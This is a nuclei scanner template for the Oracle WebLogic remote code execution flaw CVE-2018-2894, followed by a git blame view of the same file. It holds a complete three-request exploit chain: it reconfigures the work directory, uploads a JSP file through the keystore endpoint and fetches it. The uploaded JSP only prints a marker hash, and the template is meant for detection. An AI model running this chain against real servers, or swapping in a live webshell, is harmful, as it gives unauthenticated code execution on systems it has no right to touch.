nuclei-templates/cves/2018/CVE-2018-2894.yaml

id: CVE-2018-2894

info:
  name: Oracle WebLogic RCE
  author: geeknik,pdteam
  description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
  severity: critical
  tags: cve,cve2018,oracle,weblogic,rce
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2018-2894
  reference:
    - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
    - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894

requests:
  - raw:
      - |
        POST /ws_utc/resources/setting/options HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80

      - |
        POST /ws_utc/resources/setting/keystore HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g

        ------WebKitFormBoundaryuim0dyiDSPBPu31g
        Content-Disposition: form-data; name="ks_name"

        {{randstr}}
        ------WebKitFormBoundaryuim0dyiDSPBPu31g
        Content-Disposition: form-data; name="ks_edit_mode"

        false
        ------WebKitFormBoundaryuim0dyiDSPBPu31g
        Content-Disposition: form-data; name="ks_password_front"


        ------WebKitFormBoundaryuim0dyiDSPBPu31g
        Content-Disposition: form-data; name="ks_password"


        ------WebKitFormBoundaryuim0dyiDSPBPu31g
        Content-Disposition: form-data; name="ks_password_changed"

        false
        ------WebKitFormBoundaryuim0dyiDSPBPu31g
        Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp"
        Content-Type: application/octet-stream

        <%@ page import="java.util.*,java.io.*"%>
        <%@ page import="java.security.MessageDigest"%>

        <%
        String cve = "CVE-2018-2894";
        MessageDigest alg = MessageDigest.getInstance("MD5");
        alg.reset();
        alg.update(cve.getBytes());
        byte[] digest = alg.digest();
        StringBuffer hashedpasswd = new StringBuffer();
        String hx;
        for (int i=0;i<digest.length;i++){
          hx =  Integer.toHexString(0xFF & digest[i]);
          //0x03 is equal to 0x3, but we need 0x03 for our md5sum
          if(hx.length() == 1){hx = "0" + hx;}
          hashedpasswd.append(hx);
        }

        out.println(hashedpasswd.toString());
        %>
        ------WebKitFormBoundaryuim0dyiDSPBPu31g--

      - |
        GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: id
        internal: true
        group: 1
        regex:
          - '<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}'

    matchers:
      - type: word
        words:
          - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894)
Create CVE-2018-2894.yaml 2021-04-10 13:44:41 +00:00			`id: CVE-2018-2894`

			`info:`
			`name: Oracle WebLogic RCE`
Added complete poc 2021-09-12 14:20:30 +00:00			`author: geeknik,pdteam`
Create CVE-2018-2894.yaml 2021-04-10 13:44:41 +00:00			`description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.`
			`severity: critical`
			`tags: cve,cve2018,oracle,weblogic,rce`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2018-2894`
Added complete poc 2021-09-12 14:20:30 +00:00			`reference:`
			`- https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/`
			`- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894`
Create CVE-2018-2894.yaml 2021-04-10 13:44:41 +00:00
			`requests:`
Added complete poc 2021-09-12 14:20:30 +00:00			`- raw:`
			`- \|`
			`POST /ws_utc/resources/setting/options HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80`

			`- \|`
			`POST /ws_utc/resources/setting/keystore HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`------WebKitFormBoundaryuim0dyiDSPBPu31g`
			`Content-Disposition: form-data; name="ks_name"`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`{{randstr}}`
			`------WebKitFormBoundaryuim0dyiDSPBPu31g`
			`Content-Disposition: form-data; name="ks_edit_mode"`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`false`
			`------WebKitFormBoundaryuim0dyiDSPBPu31g`
			`Content-Disposition: form-data; name="ks_password_front"`
lint error fix 2021-09-12 15:15:49 +00:00

Added complete poc 2021-09-12 14:20:30 +00:00			`------WebKitFormBoundaryuim0dyiDSPBPu31g`
			`Content-Disposition: form-data; name="ks_password"`
lint error fix 2021-09-12 15:15:49 +00:00

Added complete poc 2021-09-12 14:20:30 +00:00			`------WebKitFormBoundaryuim0dyiDSPBPu31g`
			`Content-Disposition: form-data; name="ks_password_changed"`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`false`
			`------WebKitFormBoundaryuim0dyiDSPBPu31g`
			`Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp"`
			`Content-Type: application/octet-stream`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`<%@ page import="java.util.,java.io."%>`
			`<%@ page import="java.security.MessageDigest"%>`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`<%`
			`String cve = "CVE-2018-2894";`
			`MessageDigest alg = MessageDigest.getInstance("MD5");`
lint error fix 2021-09-12 15:15:49 +00:00			`alg.reset();`
Added complete poc 2021-09-12 14:20:30 +00:00			`alg.update(cve.getBytes());`
			`byte[] digest = alg.digest();`
			`StringBuffer hashedpasswd = new StringBuffer();`
			`String hx;`
			`for (int i=0;i<digest.length;i++){`
			`hx = Integer.toHexString(0xFF & digest[i]);`
			`//0x03 is equal to 0x3, but we need 0x03 for our md5sum`
			`if(hx.length() == 1){hx = "0" + hx;}`
			`hashedpasswd.append(hx);`
			`}`
lint error fix 2021-09-12 15:15:49 +00:00
Added complete poc 2021-09-12 14:20:30 +00:00			`out.println(hashedpasswd.toString());`
			`%>`
			`------WebKitFormBoundaryuim0dyiDSPBPu31g--`

			`- \|`
			`GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`extractors:`
			`- type: regex`
			`name: id`
			`internal: true`
			`group: 1`
			`regex:`
			`- '<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}'`
Create CVE-2018-2894.yaml 2021-04-10 13:44:41 +00:00
			`matchers:`
			`- type: word`
			`words:`
Added complete poc 2021-09-12 14:20:30 +00:00			`- "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894)`